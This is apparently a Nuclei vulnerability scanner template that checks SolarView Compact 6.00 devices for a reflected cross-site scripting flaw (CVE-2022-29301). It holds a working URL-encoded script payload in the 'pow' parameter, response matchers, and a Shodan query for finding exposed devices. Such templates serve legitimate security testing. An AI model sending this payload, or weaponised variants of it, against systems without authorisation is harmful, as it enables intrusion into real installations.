43 lines
1.1 KiB
YAML
43 lines
1.1 KiB
YAML
id: CVE-2022-29301
|
|
|
|
info:
|
|
name: SolarView Compact 6.00 - 'pow' Cross-Site Scripting
|
|
author: For3stCo1d
|
|
severity: high
|
|
description: |
|
|
SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'pow' parameter to Solar_SlideSub.php.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/50968
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29301
|
|
classification:
|
|
cve-id: CVE-2022-29301
|
|
metadata:
|
|
verified: true
|
|
shodan-query: http.favicon.hash:-244067125
|
|
tags: cve,cve2022,xss,solarview,edb
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '<script>alert(document.domain)</script><"">'
|
|
- 'SolarView'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by cs 06/21/2022
|